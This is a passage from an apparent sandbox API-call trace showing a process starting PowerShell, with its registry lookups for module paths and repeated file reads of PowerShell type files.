lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.800] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.800] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0077.800] CoTaskMemFree (pv=0x1ef6c0) [0077.802] CoTaskMemAlloc (cb=0xcc) returned 0x206d50 [0077.802] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x206d50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0077.802] CoTaskMemFree (pv=0x206d50) [0077.802] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd388 | out: phkResult=0xcd388*=0x32c) returned 0x0 [0077.802] RegQueryValueExW (in: hKey=0x32c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd30c, lpData=0x0, lpcbData=0xcd308*=0x0 | out: lpType=0xcd30c*=0x2, lpData=0x0, lpcbData=0xcd308*=0x6c) returned 0x0 [0077.803] CoTaskMemAlloc (cb=0x70) returned 0x195a00 [0077.803] RegQueryValueExW (in: hKey=0x32c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd2dc, lpData=0x195a00, lpcbData=0xcd2d8*=0x6c | out: lpType=0xcd2dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd2d8*=0x6c) returned 0x0 [0077.803] CoTaskMemFree (pv=0x195a00) [0077.803] CoTaskMemAlloc (cb=0xcc) returned 0x206d50 [0077.803] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x206d50, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0077.803] CoTaskMemFree (pv=0x206d50) [0077.803] CoTaskMemAlloc (cb=0xcc) returned 0x206d50 [0077.803] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x206d50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0077.803] CoTaskMemFree (pv=0x206d50) [0077.808] RegCloseKey (hKey=0x32c) returned 0x0 [0077.808] CoTaskMemAlloc (cb=0xcc) returned 0x206d50 [0077.808] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x206d50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0077.809] CoTaskMemFree (pv=0x206d50) [0077.809] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd388 | out: phkResult=0xcd388*=0x32c) returned 0x0 [0077.809] RegQueryValueExW (in: hKey=0x32c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd30c, lpData=0x0, lpcbData=0xcd308*=0x0 | out: lpType=0xcd30c*=0x0, lpData=0x0, lpcbData=0xcd308*=0x0) returned 0x2 [0077.809] RegCloseKey (hKey=0x32c) returned 0x0 [0077.824] CoTaskMemAlloc (cb=0x20c) returned 0x1ea410 [0077.824] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ea410 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0077.826] CoTaskMemFree (pv=0x1ea410) [0077.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0077.826] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0077.838] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.838] CoTaskMemFree (pv=0x1ef6c0) [0077.840] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.840] CoTaskMemFree (pv=0x1ef6c0) [0077.847] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.847] CoTaskMemFree (pv=0x1ef6c0) [0077.847] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.847] CoTaskMemFree (pv=0x1ef6c0) [0077.851] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd178 | out: phkResult=0xcd178*=0x334) returned 0x0 [0077.853] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xcd18c, lpData=0x0, lpcbData=0xcd188*=0x0 | out: lpType=0xcd18c*=0x1, lpData=0x0, lpcbData=0xcd188*=0x74) returned 0x0 [0077.854] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xcd0fc, lpData=0x0, lpcbData=0xcd0f8*=0x0 | out: lpType=0xcd0fc*=0x1, lpData=0x0, lpcbData=0xcd0f8*=0x74) returned 0x0 [0077.854] CoTaskMemAlloc (cb=0x78) returned 0x195a00 [0077.854] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xcd0cc, lpData=0x195a00, lpcbData=0xcd0c8*=0x74 | out: lpType=0xcd0cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd0c8*=0x74) returned 0x0 [0077.854] CoTaskMemFree (pv=0x195a00) [0077.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0077.854] SetErrorMode (uMode=0x1) returned 0x1 [0077.854] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd050 | out: lpFileInformation=0xcd050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0077.854] SetErrorMode (uMode=0x1) returned 0x1 [0077.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.857] SetErrorMode (uMode=0x1) returned 0x1 [0077.857] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd050 | out: lpFileInformation=0xcd050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0077.857] SetErrorMode (uMode=0x1) returned 0x1 [0077.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0077.862] SetErrorMode (uMode=0x1) returned 0x1 [0077.862] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd050 | out: lpFileInformation=0xcd050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0077.862] SetErrorMode (uMode=0x1) returned 0x1 [0077.867] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.867] CoTaskMemFree (pv=0x1ef6c0) [0077.875] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.876] CoTaskMemFree (pv=0x1ef6c0) [0077.877] GetACP () returned 0x4e4 [0077.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.898] SetErrorMode (uMode=0x1) returned 0x1 [0077.899] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338 [0077.900] GetFileType (hFile=0x338) returned 0x1 [0077.900] SetErrorMode (uMode=0x1) returned 0x1 [0077.900] GetFileType (hFile=0x338) returned 0x1 [0077.902] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2e9c698*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.904] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2e9c698*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.905] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2e9c698*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.905] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2e9c698*, lpNumberOfBytesRead=0xccf88*=0xcf3, lpOverlapped=0x0) returned 1 [0077.905] ReadFile (in: hFile=0x338, lpBuffer=0x2e9baf3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2e9baf3*, lpNumberOfBytesRead=0xccf88*=0x0, lpOverlapped=0x0) returned 1 [0077.905] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2e9c698*, lpNumberOfBytesRead=0xccf88*=0x0, lpOverlapped=0x0) returned 1 [0077.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.908] SetErrorMode (uMode=0x1) returned 0x1 [0077.908] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0077.909] SetErrorMode (uMode=0x1) returned 0x1 [0077.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.910] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x338) returned 0x0 [0077.910] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0 [0077.910] CoTaskMemAlloc (cb=0x5a) returned 0x20f040 [0077.910] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x20f040, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0 [0077.911] CoTaskMemFree (pv=0x20f040) [0077.911] RegCloseKey (hKey=0x338) returned 0x0 [0077.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.959] GetSystemInfo (in: lpSystemInfo=0xcbc20 | out: lpSystemInfo=0xcbc20*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0077.959] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0077.988] SetErrorMode (uMode=0x1) returned 0x1 [0077.989] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338 [0077.989] GetFileType (hFile=0x338) returned 0x1 [0077.989] SetErrorMode (uMode=0x1) returned 0x1 [0077.989] GetFileType (hFile=0x338) returned 0x1 [0077.989] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.990] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.990] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.990] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.990] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.991] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.991] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.991] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.991] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.992] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.993] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.993] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.993] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.993] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.994] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.994] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.994] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.996] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.996] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.997] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.997] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.997] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.998] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.998] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.998] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.998] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.999] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.999] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0077.999] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.000] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.000] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.000] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.000] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.004] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.004] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.005] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.005] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, 